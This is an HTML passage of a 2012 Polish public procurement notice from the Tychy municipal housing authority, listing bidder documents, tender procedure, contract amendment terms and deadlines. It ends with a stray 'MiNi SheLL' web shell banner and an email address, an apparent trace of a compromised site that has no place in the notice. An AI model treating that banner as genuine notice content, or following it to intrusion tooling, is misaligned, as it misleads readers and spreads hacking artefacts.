<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy -  sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ
2)	Wypełniony i podpisany formularz oferty cenowej - sporządzony wg wzoru stanowiącego załącznik nr 1a do SIWZ
3)	stosowne pełnomocnictwo (a) do działania w imieniu wykonawcy w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru.
4)	w przypadku wykonawców wspólnie ubiegających się się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego
5)	dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następujących przypadkach:
1)	zmian personalnych, adresowych, formy prawnej stron umowy;
2)	zmiany osoby pełniącej nadzór;
3)	zmiany przepisów Ustawy o podatku od towarów i usług w zakresie wysokości stawki VAT 
4)	zmiany terminu realizacji przedmiotu umowy, w następstwie:
     a )  zmian będących następstwem działań organów administracji, (np. opóźnienia
              w uzyskaniu uzgodnień, decyzji administracyjnych dotyczących przedmiotu umowy);
        b)   siły wyższej rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego                                 
              niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy 
              zachowaniu najwyższej staranności  a które uniemożliwia wykonawcy wykonanie jego 
              zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony umowy 
              zobowiązane są dołożyć wszelkich starań w celu  ograniczenia do minimum opóźnienia             
              w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły 
              wyższej;
        c)   zmian będących następstwem okoliczności leżących po stronie Zamawiającego i nie 
              wynikających z winy Wykonawcy ( np. wstrzymanie terminu realizacji przedmiotu umowy),               
        d)   wystąpienia okoliczności, które nie zostały przewidziane na etapie prowadzenia 
              postępowania;    
        e)   wystąpienia robót dodatkowych nie objętych zamówieniem podstawowym, których   
              wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, 
              jeżeli:
             -   z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od 
             zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów,    
             lub
             -  wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia 
             dodatkowego, 
        f)    wykonania robót zamiennych;
        g)   w sytuacji udokumentowanego  wystąpienia niesprzyjających warunków atmosferycznych 
              uniemożliwiających wykonywanie robót na zewnątrz budynku - zgodnie z technologią i 
              sztuką budowlaną, pod warunkiem terminowego, zgodnego z umową terminu rozpoczęcia
              robót.   
    5)  zmiany sposobu i terminu rozliczeń 
    6)  w przypadku zmian o których mowa w pkt. 3) ÷ 5 Wykonawca przedłoży Zamawiającemu do 
         akceptacji zaktualizowany harmonogram rzeczowo-finansowy stanowiący załącznik do 
           umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umtychy.pl/jednostki-organizacyjne-miasta/35<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Budynków Mieszkalnych w Tychach,
Dział Techniczno-Eksploatacyjny , 43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.12.2012 godzina 10:00, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com